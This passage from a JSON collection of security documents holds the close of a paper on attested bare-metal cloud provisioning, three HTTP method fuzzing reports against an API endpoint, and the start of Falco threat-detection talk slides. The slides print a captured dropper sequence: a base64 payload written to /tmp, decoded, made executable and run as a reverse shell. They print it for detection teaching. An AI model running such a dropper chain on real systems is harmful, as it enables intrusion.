of\nKeylime and M2, or that wants to take advantage of a\nlarge-scale implementation by the provider, can choose to\ntrust provider-deployed versions of these services. Also, if\na tenant chooses to trust the network isolation of the provider\n(e.g. HIL) he/she may feel no need to encrypt network\nand/or storage traffic. Finally, tenants that are willing to trust\nfirmware validation (e.g. firmware is bug-free and signed by\nthe vendor) are free to do that and will not incur any of the\nperformance overhead of attestation.\nTo enable a wide community to inspect them and minimize\ntheir TCB, all components of Bolted are open source,\nincluding Keylime [4], Heads [22], M2 [2], and HIL [1]. We\ndesigned HIL, for example, to be a simple micro-service\nrather than a general purpose tool like IRONIC [17] or\nEmulab [9]. HIL is being incorporated into a variety of\ndifferent use cases by adding tools and services on and around\nit rather than turning it into a general purpose tool. Another\nkey example of a small open source component is Heads.\nHeads is much simpler than UEFI. Since it is based on Linux,\nit has a code base that is under constant examination by a\nhuge community of developers. Heads is reproducibly built,\nso a tenant can examine the software to ensure that it meets\ntheir security requirements and then ensure that the firmware\ndeployed on machines is the version that they require. For\nexample, the firmware must measure all of itself before\nlaunching the next level of software. As another example, weneed to make sure that firmware zeros all the memory of a\nserver before enabling subsequent software to run3.\nWe are not able to flash Heads on all servers, and the\nservers we have flashed it on require physical access [23].\nHowever, we are working with the OpenCompute community\nto both enable Heads to be flashed remotely and to ensure\nthat OpenCompute vendors provide Heads as a supported\noption; it is enormously difficult without vendor support\nto ensure that servers with minor changes will successfully\nboot. If we cannot flash our own firmware, Bolted uses\nstock firmware to download Heads. In this situation, Heads\nprovides us with a standardized execution environment for\nthe Keylime client and download the tenant kernel. While we\nhave no guarantee that the stock firmware is up-to-date and\nfully measured, in this situation Bolted provides attestation\nagainst the white list of the most up-to-date firmware to\nensure known vulnerabilities have been addressed.\nBolted protects against compromise of firmware executable\nby the system CPU; however modern systems may have other\nprocessors with persistent firmware inaccessible to the main\nCPU; compromise of this firmware is not addressed by this\napproach. These include: Base Management Controllers\n(BMCs) [37], the Intel Management Engine [18,32,39], PCIe\ndevices with persistent flash-based firmware, like some GPUs\nand NICs, and storage devices [30]. Additional work (e.g.\ntechniques like IOMMU use, disabling the Management\nEngine [3] and the use of systems without unnecessary\nfirmware) may be needed to meet these threats.\nWhile it is a work in progress, our early scalability results\nare encouraging, even in an initial prototype on a testbed\nwith several known performance and scalability issues. They\nsuggest that a complete implementation of Bolted with Heads\nburned into the firmware and a larger scale storage backend\nwill enable us to elastically provision dozens, perhaps even\nhundreds of fully attested servers in under five minutes. If we\ncan achieve this, it will make Bolted appropriate for highly-\nelastic security-sensitive situations, e.g., a national emergency\nrequiring many computers. This will hugely reduce the need\nfor institutions that keep around large numbers of largely idle\nmachines to deal with low probability events.\n8 Acknowledgment\nWe would like thank Intel, Red Hat, Two Sigma, NetApp and\nCisco, the core industry partners of MOC for supporting this\nwork. We gratefully acknowledge Piyanai Saowarattitada and\nRadoslav Nikiforov Milanov for their significant contributions\nin development and their assistance in the evaluations. Partial\nsupport for this work was provided by the USAF Cloud Anal-\nysis Model Prototype project, National Science Foundation\nawards CNS-1414119, ACI-1440788 and OAC-1740218.\n3We need to zero memory in the firmware since a malicious provider\nmay steal a server from a tenant at any point and we need to make sure that\nall state is removed from the node before the next tenant can see it.References\n[1]hil: Hardware Isolation Layer, formerly Hardware as a Service.\nhttps://github.com/CCI-MOC/hil.\n[2]Malleable Metal as a Service (M2). https://github.com/CCI-MOC/M2.\n[3]mecleaner: Tool for partial deblobbing of intel me/txe firmware\nimages. https://github.com/corna/me cleaner.\n[4]python-keylime: Bootstrapping and Maintaining Trust in the Cloud.\nhttps://github.com/mit-ll/python-keylime.\n[5]Trusted Platform Module (TPM) Summary. https:\n//trustedcomputinggroup.org/trusted-platform-module-tpm-summary/,\nApr. 2008.\n[6]4 major reasons some organizations are still reluctant to move to the\ncloud jLogicalis. http://www.hypeorripe.com/2013/11/13/4-major-\nreasons-some-organizations-are-still-reluctant-to-move-to-the-cloud,\n2013.\n[7]Creating a Classified Processing Enclave in the Public Cloud jIARPA.\nhttps://www.iarpa.gov/index.php/working-with-iarpa/requests-for-\ninformation/creating-a-classified-processing-enclave-in-the-public-\ncloud, 2017.\n[8]Report to the President on Federal IT Modernization - Introduction to\nthe Report. https://itmodernization.cio.gov/, 2017.\n[9]ANDERSON , D. S., H IBLER , M., S TOLLER , L., S TACK , T., AND\nLEPREAU , J.Automatic online validation of network configuration in\nthe emulab network testbed. In Autonomic Computing, 2006. ICAC\u201906.\nIEEE International Conference on (2006), IEEE, pp. 134\u2013142.\n[10] BRASSER , F., M \u00a8ULLER , U., D MITRIENKO , A., K OSTIAINEN , K.,\nCAPKUN , S., AND SADEGHI , A. Software grand exposure: SGX\ncache attacks are practical. CoRR abs/1702.07521 (2017).\n[11] BUCCI , S.Getting Cyber Serious: Mastering the Challenges of Federal\nCloud Computing. The Heritage F oundation .\n[12] BULYGIN , Y., L OUCAIDES , J., F URTAK , A., B AZHANIUK , O., AND\nMATROSOV , A. Summary of attacks against BIOS and secure boot.\nDefcon-22 (2014).\n[13] B UTTERWORTH , J., K ALLENBERG , C., K OVAH , X., AND HERZOG ,\nA.BIOS Chronomancy: Fixing the core root of trust for measurement.\nInProceedings of the 2013 ACM SIGSAC Conference on Computer\n& Communications Security (New Y ork, NY , USA, 2013), CCS\n\u201913, ACM, pp. 25\u201336.\n[14] C ANONICAL . Metal as a service. urlhttps://maas.ubuntu.com/.\n[15] CORPORATION , I. A Trusted Cloud Solution from HyTrust,\nVMware, and Intel. https://www.intel.com/content/www/us/en/cloud-\ncomputing/path-to-secure-compliant-trusted-cloud-brief.html, 2016.\n[16] COSTAN , V., L EBEDEV , I., AND DEVADAS , S.Sanctum: Minimal\nhardware extensions for strong software isolation. In USENIX Security\n(2016), vol. 16, pp. 857\u2013874.\n[17] DER VEEN ET AL ., D. V. Openstack ironic wiki. url-\nhttps://wiki.openstack.org/wiki/Ironic.\n[18] ERMOLOV , M., AND GORYACHY , M. How to hack a turned - off\ncomputer, or running unsigned code in intel management engine.\nhttps://www.blackhat.com/docs/eu-17/materials/eu-17-Goryachy-\nHow-To-Hack-A-Turned-Off-Computer-Or-Running-Unsigned-\nCode-In-Intel-Management-Engine.pdf, Dec 2017.\n[19] FUJITA , T., AND CHRISTIE , M. tgt: Framework for storage target\ndrivers. In Proceedings of the Linux Symposium (2006), vol. 1, Citeseer,\npp. 303\u2013312.\n[20] HEASMAN , J.Rootkit threats. Network Security 2006 , 1 (2006), 18\u201319.\n[21] HENNESSEY , J., T IKALE , S., T URK, A., K AYNAR , E. U., H ILL, C.,\nDESNOYERS , P., AND KRIEGER , O.HIL: Designing an exokernel for\nthe data center. In Proceedings of the 7th ACM Symposium on Cloud\nComputing (SoCC\u201916) (Santa Clara, CA, Oct. 2016).[22] HUDSON , T. heads: A minimal Linux that runs as a coreboot or\nLinuxBoot ROM payload to provide a secure, flexible boot environment\nfor laptops and servers. https://github.com/osresearch/heads.\n[23] H UDSON , T. Heads Webpage. https://trmm.net/Heads.\n[24] HUDSON , T., K OVAH , X., AND KALLENBERG , C. ThunderStrike\n2: Sith Strike. Black Hat USA Briefings (2015).\n[25] HUDSON , T., AND RUDOLPH , L. Thunderstrike: EFI firmware\nbootkits for Apple Macbooks. In Proceedings of the 8th ACM\nInternational Systems and Storage Conference (2015), ACM, p. 15.\n[26] IEEE . 802.1q-2014 - bridges and bridged networks.\nhttp://www.ieee802.org/1/pages/802.1Q-2014.html.\n[27] INC., A. W. S. Amazon EC2 Bare Metal Instances with Direct Access\nto Hardware. https://aws.amazon.com/blogs/aws/new-amazon-ec2-\nbare-metal-instances-with-direct-access-to-hardware/, 2017.\n[28] INTERNAP . Bare-metal AgileSERVER. http://www.internap.com/bare-\nmetal/, 2015.\n[29] KING, S. T., AND CHEN, P. M. Subvirt: Implementing malware with\nvirtual machines. In Security and Privacy, 2006 IEEE Symposium on\n(2006), IEEE, pp. 14\u2013pp.\n[30] KIRK, J. Destroying your hard drive is the only way to stop this\nsuper-advanced malware. https://www.pcworld.com/article/2884952/\nequation-cyberspies-use-unrivaled-nsastyle-techniques-to-hit-iran-\nrussia.html, Feb 2015.\n[31] KOCHER , P., G ENKIN , D., G RUSS , D., H AAS, W., H AMBURG ,\nM., L IPP, M., M ANGARD , S., P RESCHER , T., S CHWARZ , M., AND\nYAROM , Y.Spectre attacks: Exploiting speculative execution. ArXiv\ne-prints (Jan. 2018).\n[32] KROIZER , A. Tpm and intel ptt overview. http://tce.webee.\needev.technion.ac.il/wp-content/uploads/sites/8/2016/01/AK TPM-\noverview-technion.pdf, Sep 2015.\n[33] LEE, S., S HIH, M., G ERA, P., K IM, T., K IM, H., AND PEINADO , M.\nInferring fine-grained control flow inside SGX enclaves with branch\nshadowing. CoRR abs/1611.06952 (2016).\n[34] LIPP, M., S CHWARZ , M., G RUSS , D., P RESCHER , T., H AAS,\nW., M ANGARD , S., K OCHER , P., G ENKIN , D., Y AROM , Y., AND\nHAMBURG , M. Meltdown. ArXiv e-prints (Jan. 2018).\n[35] LIU, F., Y AROM , Y., G E, Q., H EISER , G., AND LEE, R. B. Last-level\ncache side-channel attacks are practical. In 2015 IEEE Symposium on\nSecurity and Privacy (May 2015), pp. 605\u2013622.\n[36] MOHAN , A., T URK, A., G UDIMETLA , R., T IKALE , S., H ENNESSEY ,\nJ., K AYNAR , U., G.C OOPERMAN , DESNOYERS , P., AND KRIEGER ,\nO. M2: Malleable Metal as a Service. ArXiv e-prints (2018).\n[37] MOORE , H. A penetration tester\u2019s guide to ipmi and bmcs. https:\n//blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/,\nAug 2017.\n[38] MORGAN , B., A LATA , E., N ICOMETTE , V., AND KANICHE , M.\nBypassing IOMMU protection against I/O attacks. In 2016 Seventh\nLatin-American Symposium on Dependable Computing (LADC) (Oct\n2016), pp. 145\u2013150.\n[39] NEWMAN , L. H. Intel chip flaws leave millions of devices\nexposed. https://www.wired.com/story/intel-management-engine-\nvulnerabilities-pcs-servers-iot/, Nov 2017.\n[40] O\u2019K EEFFE , D., M UTHUKUMARAN , D., A UBLIN , P.-L., K EL-\nBERT , F., P RIEBE , C., L IND, J., Z HU, H., AND PIETZUCH , P.\nspectre-attack-sgx. https://github.com/lsds/spectre-attack-sgx.\n[41] PACKET . The promise of the cloud delivered on bare metal.\nhttps://www.packet.net, 2017.\n[42] PAQUETTE , S., J AEGER , P. T., AND WILSON , S. C. Identifying the\nsecurity risks associated with governmental use of cloud computing.\nGovernment Information Quarterly 27 , 3 (July 2010), 245\u2013253.[43] RACKSPACE . Rackspace Cloud Big Data OnMetal.\nhttp://go.rackspace.com/baremetalbigdata/, 2015.\n[44] RAZAVI , K., G RAS, B., B OSMAN , E., P RENEEL , B., G IUFFRIDA ,\nC.,AND BOS, H.Flip Feng Shui: Hammering a needle in the software\nstack.\n[45] RISTENPART , T., T ROMER , E., S HACHAM , H., AND SAVAGE , S.\nHey, you, get off of my cloud: exploring information leakage in\nthird-party compute clouds. In Proceedings of the 16th ACM conference\non Computer and communications security (2009), ACM, pp. 199\u2013212.\n[46] RUTKOWSKA , J. Intel x86 considered harmful, 2015.\nhttps://blog.invisiblethings.org/papers/2015/x86 harmful.pdf.\n[47] SCHEAR , N., C ABLE , II, P. T., M OYER , T. M., R ICHARD , B., AND\nRUDD, R.Bootstrapping and maintaining trust in the cloud. In Proceed-\nings of the 32Nd Annual Conference on Computer Security Applications\n(New Y ork, NY , USA, 2016), ACSAC \u201916, ACM, pp. 65\u201377.\n[48] SOFTLAYER . Big data solutions. http://www.softlayer.com/big-data,\n2015.\n[49] WAGNER , H., Z ACH, D.-I. M., AND LINTENHOFER , D.-I. F. M.\nA.-P. BIOS-rootkit LightEater.\n[50] WEIL, S. A., B RANDT , S. A., M ILLER , E. L., L ONG, D. D., AND\nMALTZAHN , C.Ceph: A scalable, high-performance distributed file\nsystem. In Proceedings of the 7th symposium on Operating systems\ndesign and implementation (2006), USENIX Association, pp. 307\u2013320.\n[51] WOJTCZUK , R., AND RUTKOWSKA , J. Attacking intel trusted\nexecution technology. Black Hat DC (2009).\n[52] XU, Y., C UI, W., AND PEINADO , M. Controlled-channel attacks:\nDeterministic side channels for untrusted operating systems. In Proceed-\nings of the 36th IEEE Symposium on Security and Privacy (Oakland)\n(May 2015), IEEE Institute of Electrical and Electronics Engineers." - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 2 2021-04-19 20_18_17.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 2\nin REST Project 3/https://164.90.157.161 Test Suite/https://164.90.157.161 Test Case 1\nSummary\nStarted at 2021-04-19 20:18:17\nTime taken 00:04:59.353\nTotal scans performed: 2189\nIssues found: 2\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingRequest 1 2 2\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest OPTIONS https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest HEAD https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #2" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-14 18_11_30.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin Project 1/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 18:11:30\nTime taken 00:00:08.744\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response: \nError
Cannot PURGE /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n \nError
Cannot COPY /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n \nError
Cannot UNLOCK /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n \nError
Cannot LOCK /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n \nError
Cannot PROPFIND /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n \nError
Cannot PATCH /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n \nError
Cannot TRACE /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n \nError
Cannot DELETE /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n \nError
Cannot PUT /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest POST https://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n \nError
Cannot POST /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2021-04-14 20_04_13.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin Project 7/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 20:04:13\nTime taken 00:04:32.546\nTotal scans performed: 2042\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response: \nError
Cannot PURGE /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n \nError
Cannot COPY /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n \nError
Cannot UNLOCK /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n \nError
Cannot LOCK /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n \nError
Cannot PROPFIND /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n \nError
Cannot PATCH /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n \nError
Cannot TRACE /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n \nError
Cannot DELETE /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n \nError
Cannot PUT /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest POST https://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n \nError
Cannot POST /
\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "Falco", - "file_name": "kubeconna23-anomaly-detection-slides.pdf" - }, - "content": [ - { - "data": "A Wind of Change for Threat Detection \nMelissa Kilby \nServices Security Engineering - Apple \nTuesday November 7, 2023 12 /colon.uc10pm - 12 /colon.uc45pm CST \n(W375ab - Security Track)\nThe Falco Project\nArtificial Intelligence is on fireA work in progress \u2026\n\u2026 detecting cyber attacks at scaleLinux Infrastructure Layer\nidentity management systemsauthentication systemsbuild systemsnetwork devicesnetwork storagesource control systemsdatabase systemsbackend app serversnetwork proxy serversdata centersLinux Security Monitoring - \u201cKernel Events Never Lie\u201d\nCPUSystem CallSystem CallSystem CallMemoryHard DiskApp Process\nKernelApp ProcessApp ProcessApp ProcessLargest gateway to kernel from userspaceHistorical Process Execution\n\u2026/bin/java/bin/sh/bin/sh\n/usr/bin/tee\n/bin/dash\n/usr/bin/tee\n \n \n proc.name: sh \nproc.exepath: /bin/sh \nproc.cmdline: sh -c echo \nf0VMRgEBAQAAAA[TRUNCATED]AAFhqAGoFieMxyc2AhcB5vesn\nsge5ABAAAInjwesMweMMsH3NgIXAeBBbie[TRUNCATED]AAM2A \n| tee /tmp/Qhhg.b64Historical Process ExecutionHistorical Process Execution\n\u2026/bin/java/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh/bin/sh\n/usr/bin/tee \n proc.name: sh \n proc.exepath: /bin/sh \n proc.cmdline: sh -c base64 -d /tmp/Qhhg.b64|tee /tmp/Qhhg \n/bin/dash\n/usr/bin/teeHistorical Process ExecutionHistorical Process Execution\n\u2026/bin/java/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh /bin/sh \n proc.name: sh \n proc.exepath: /bin/sh \n proc.cmdline: sh -c chmod +x /tmp/Qhhg \n/bin/dashHistorical Process ExecutionHistorical Process Execution\n\u2026/bin/java/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh\n/bin/shNetwork \nConnect \nEvent/bin/sh\n/tmp/Qhhg/bin/sh/bin/dashNetwork Connect \nEvent\n \n proc.name: sh \n proc.exepath: /bin/sh \n proc.cmdline: sh \n \nREVERSE SHELL\n\u2026/bin/java/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh\n/bin/sh/questionmark\n/questionmark/bin/bashNetwork \nConnect \nEvent/usr/bin/python2.7/bin/uname\nREVERSE SHELL\n/bin/sh\n/tmp/Qhhg/bin/shHistorical Process ExecutionThe Falco Project\nproc.aname: java -> sh -> sh -> python2.7 -> bash -> unameLinux Kernel View Mirror: The Now of the Process Tree\n\u2026/bin/java\n/bin/sh/bin/bashNetwork \nConnect \nEvent/usr/bin/python2.7/bin/uname\nREVERSE SHELL\n/bin/shpidppid\u2026Process/Thread n\nThe Falco Project\npidppid\u2026Process/Thread n\npidppid\u2026Process/Thread nLinux Kernel View Mirror: Falco\u2019s 